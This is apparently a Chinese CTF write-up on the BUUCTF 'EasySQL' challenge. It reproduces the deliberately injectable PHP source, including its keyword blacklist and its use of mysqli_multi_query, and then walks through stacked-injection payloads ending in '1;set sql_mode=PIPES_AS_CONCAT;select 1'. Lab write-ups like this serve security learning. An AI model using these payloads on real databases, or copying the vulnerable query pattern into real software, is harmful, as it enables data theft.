题目
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ExR5uHy2-1581163879403)(E:\CTF\小白学习总结\1-BUUCTF\WEB\EasySQL\pic\ti.PNG)]](https://img-blog.csdnimg.cn/20200208201237499.PNG)
writeup
尝试输入:1
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tTVjv6XI-1581163879404)(E:\CTF\小白学习总结\1-BUUCTF\WEB\EasySQL\pic\1.PNG)]](https://img-blog.csdnimg.cn/20200208201247480.PNG)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-X64SHFul-1581163879405)(E:\CTF\小白学习总结\1-BUUCTF\WEB\EasySQL\pic\2.PNG)]](https://img-blog.csdnimg.cn/20200208201256573.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d5al8xMjE2,size_16,color_FFFFFF,t_70)
尝试众多后发现有三种返回值:
- 正常回显
- nonono
- 空白
考虑到前面做过的题,堆叠注入
上网查看各位大佬的文章,找到了源码:
<?php
session_start();
include_once "config.php";
$post = array();
$get = array();
global $MysqlLink;
//GetPara();
$MysqlLink = mysqli_connect("localhost",$datauser,$datapass);
if(!$MysqlLink){
die("Mysql Connect Error!");
}
$selectDB = mysqli_select_db($MysqlLink,$dataName);
if(!$selectDB){
die("Choose Database Error!");
}
foreach ($_POST as $k=>$v){
if(!empty($v)&&is_string($v)){
$post[$k] = trim(addslashes($v));
}
}
foreach ($_GET as $k=>$v){
}
}
//die();
?>
<html>
<head>
</head>
<body>
<a> Give me your flag, I will tell you if the flag is right. </ a>
<form action="" method="post">
<input type="text" name="query">
<input type="submit">
</form>
</body>
</html>
<?php
if(isset($post['query'])){
$BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";
//var_dump(preg_match("/{$BlackList}/is",$post['query']));
if(preg_match("/{$BlackList}/is",$post['query'])){
//echo $post['query'];
die("Nonono.");
}
if(strlen($post['query'])>40){
die("Too long.");
}
$sql = "select ".$post['query']."||flag from Flag";
mysqli_multi_query($MysqlLink,$sql);
do{
if($res = mysqli_store_result($MysqlLink)){
while($row = mysqli_fetch_row($res)){
print_r($row);
}
}
}while(@mysqli_next_result($MysqlLink));
}
?>
看到mysql_multi_query(),可以堆叠注入
发现黑名单:
if(isset($post['query'])){
$BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";
//var_dump(preg_match("/{$BlackList}/is",$post['query']));
if(preg_match("/{$BlackList}/is",$post['query'])){
//echo $post['query'];
die("Nonono.");
}
过滤了很多,尤其是flag。。。好气哦~
按照之前的尝试查询(随便注)
1 ; show databases;
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Wk1HrFiF-1581163879406)(E:\CTF\小白学习总结\1-BUUCTF\WEB\EasySQL\pic\3.PNG)]](https://img-blog.csdnimg.cn/20200208201312738.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d5al8xMjE2,size_16,color_FFFFFF,t_70)
1 ; show tables;
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BWDsdIo2-1581163879407)(E:\CTF\小白学习总结\1-BUUCTF\WEB\EasySQL\新建文件夹\4.PNG)]](https://img-blog.csdnimg.cn/2020020820132170.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d5al8xMjE2,size_16,color_FFFFFF,t_70)
但是过滤了flag。。。
查找资料发现管道拼接||
且源码中存在:
$sql = "select ".$post['query']."||flag from Flag";
对于mysql可以通过更改sql_mode=PIPES_AS_CONCAT来满足该功能
故,构造:
1;set sql_mode=PIPES_AS_CONCAT;select 1
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2s7qX8LM-1581163879407)(E:\CTF\小白学习总结\1-BUUCTF\WEB\EasySQL\新建文件夹\5.PNG)]](https://img-blog.csdnimg.cn/20200208201332287.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d5al8xMjE2,size_16,color_FFFFFF,t_70)
得到flag~
知识点
mysql 修改sql_mode 实现字符串管道‘||’连接
在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接,但在mysql 缺省不支持。需要调整mysql 的sql_mode 模式:pipes_as_concat 来实现oracle 的一些功能
